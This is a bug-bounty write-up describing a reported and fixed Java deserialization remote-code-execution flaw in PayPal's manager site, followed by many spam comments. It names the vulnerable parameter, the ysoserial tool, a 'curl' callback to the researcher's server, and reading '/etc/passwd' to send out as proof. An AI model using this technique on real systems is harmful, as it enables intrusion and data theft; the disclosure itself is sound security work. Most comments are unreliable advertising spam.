In December 2015, I found a critical vulnerability in one of PayPal business websites (manager.paypal.com). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe JAVA object deserialization and to access production databases. I immediately reported this bug to PayPal security team and it was fixed promptly.
While testing manager.paypal.com application, I noticed an unusual post form parameter “oldFormData” that looks like a complex object after base64 decoding:
Details
The following research showed that it is a Java serialized
object without any signature. It means you can send a serialized object of any existing class to the server, and the “readObject”
(or “readResolve”) method of that class will be called. For exploitation,
you need to find a suitable class in the application “classpath” which can be serialized
and has something interesting (from exploitation point of view) in the “readObject” method.
You can read about this technique in the recent article by FoxGlove Security. A year ago, Chris Frohoff (@frohoff) and Gabriel Lawrence
(@gebl) did a great job and found suitable classes in Commons Collections library that could lead to remote code execution. They also
published the “ysoserial” payload generation tool on their github page.
Exploit
I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.
Then I sent the base64 encoded payload in the “oldFormData” parameter to the application server and was impressed by an incoming request from the PayPal network that appeared in my NGINX access log:
I realized that I could execute arbitrary OS commands on the web servers of manager.paypal.com, establish a back connection
to my own Internet server and, for example, upload and execute a backdoor. As a result, I could get access to production databases used by the manager.paypal.com application.
Instead, I just read “/etc/passwd” file by sending it
to my server as a proof of the vulnerability:
I also recorded a video how to reproduce this vulnerability
and reported it to the PayPal security team.
Later, I found out that many other endpoints of the manager.paypal.com
application also use serialized objects and can be exploited as well.
In a month, my report received a Duplicate status because another researcher, Mark Litchfield, reported a similar vulnerability two days earlier than I did (on December 11, 2015). PayPal decided to pay me a good bounty anyway, and I have nothing but respect
for them.
Did they pay you thru paypal? :)
ReplyDeleteThanks
ReplyDeleteVery nice work. It would be cool if you would reference advice on how to fix a Java serialization vulnerability. A Google search gave me poor results in the first page :(
ReplyDeletehttps://www.google.co.uk/search?q=how+to+fix+a+java+serialization+vulnerability
Otherwise we can expect the improvements to be very slow....
1. Identify any jar or class files that contain the vulnerable library e.g cd && grep -Rl 'InvokerTransformer' . | grep -E "\.(jar|class)"
Delete2. Delete (dry run first) the file InvokerTransformer.class within any JARs you found in Step 1.
The problem lies with the Serialization api itself.
ReplyDeletehttps://github.com/pfirmstone/river-internet/tree/Input-validation-for-Serialization/src/org/apache/river/api/io
Nice article...! Thanks for sharing this informative.
ReplyDeleteeCommerce Solution Provider India
Nice content with valuable information. Thanks for sharing.
ReplyDeleteJava Training institute in Velachery
If you set out to make me think today; mission accomplished! I really like your writing style and how you express your ideas. Thank you. Hamza PayPal Solutions - Remove Limit From PayPal Easily - Receive Payment & Withdrawal. paypal solutions
ReplyDeletewhich tool was that?
ReplyDelete>I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.
javascript scripting examples for students
ReplyDeleteFor niit projects, assignments, cycle tests, lab@homes, c#, html, java, java script, sql, oracle and much more visit http://gniithelp.blogspot.in or https://mkniit.blogspot.in
ReplyDeleteThis is my first visit to your blog, your post made productive reading, thank you.
ReplyDeleteJava Training in Chennai
We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work. youtube converter
ReplyDeleteThanks for sharing your valuable time for us, nice article and blog.
ReplyDeleteJava Training in Chennai
Good post, apart for programming bugs paypal and stripe too, are common online payments platforms....
ReplyDeleteI would be looking forward for similar post for stripe too...
Thanks
Great info, Thanks for sharing your valuable information.
ReplyDeleteJava Training in Velachery | Java Training institute in velachery
Nice and good article.. it is very useful for me to learn and understand easily.. thanks for sharing your valuable information and time.. please keep updating.morephp jobs in hyderabad.
ReplyDeleteYou CAN increase your overall penis length and girth. Using an penis extender can also improve sexual performance and stamina through the process of cell division which can improve blood flow to the penis. Our Peyronies Editions are highly recommended penis straightener devices.
ReplyDeleteI love reading an article that will make men and women think. Also, many thanks for allowing for me to comment!
ReplyDeletehttps://powerseotools.blogspot.com/
ReplyDeleteEthereumpro.net is best company in the united kingdom to Exchange Ethereum to Cash USD Paypal Payoneer Bank Account, sell your ethereum at best price for paypal transfer
Exchange Ethereum to Paypal or cash
I would like to say that this blog really convinced me, you give me best information! Thanks, very good post.
ReplyDeleteexchange paypal
Keep Posting:)
• Nice and good article. It is very useful for me to learn and understand easily. Thanks for sharing your valuable information and time. Please keep updating. Power Bi Online course Bangalore
ReplyDelete
ReplyDeleteIt was Nice post and very useful information
SAP Remote Online Access
Regular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you! name patches
ReplyDeleteI think about it is most required for making more on this get engaged complete bathroom installations
ReplyDeleteI think about it is most required for making more on this get engaged vector
ReplyDeleteI think about it is most required for making more on this get engaged custom military patches
ReplyDeleteWe are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work Hate Story 4 Watch Online
ReplyDeleteWell we really like to visit this site, many useful information we can get here. best mechanical keyboard under 100
ReplyDeleteI was taking a gander at some of your posts on this site and I consider this site is truly informational! Keep setting up.. portrait retouching service(s)
ReplyDeleteRegular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you! putlocker today
ReplyDeleteYou have done a amazing job with you website best front facing car seat for 1 year old
ReplyDeleteHere at this site really the fastidious material collection so that everybody can enjoy a lot. Happy mothers day images and quotes
ReplyDeleteThis is really very nice post you shared, i like the post, thanks for sharing.. Online Calendar
ReplyDeleteCool stuff you have and you keep overhaul every one of us more info
ReplyDeleteI’ve read some good stuff here. Definitely worth bookmarking for revisiting. I surprise how much effort you put to create such a great informative website. Nutzfahrzeuge Ankauf
ReplyDeleteHi! This is my first visit to your blog! We are a team of volunteers and new initiatives in the same niche. Blog gave us useful information to work. You have done an amazing job! investment companies in bahrain
ReplyDeletethis blog was really great, never seen a great blog like this before. i think im gonna share this to my friends.. what is guest post service
ReplyDeleteHi buddies, it is great written piece entirely defined, continue the good work constantly. shari'ah compliant investment
ReplyDeleteA debt of gratitude is in order for the blog entry amigo! Keep them coming... Happy Mothers Day Quotes from Husband
ReplyDeleteA debt of gratitude is in order for the blog entry amigo! Keep them coming... tile flooring mn
ReplyDeletePersonally I think overjoyed I discovered the blogs. what day today
ReplyDeleteYour work is very good and I appreciate you and hopping for some more informative posts reseller
ReplyDeleteI read this article. I think You put a great deal of exertion to make this article. I like your work. Bewertungen kaufen
ReplyDeleteThis is truly an practical and pleasant information for all. Thanks for sharing this to us and more power Happy Ramadan Greetings 2018
ReplyDeleteThe article posted was very informative and useful. You people are doing a great job. Keep going. Happy Ramadan Wishes 2018
ReplyDelete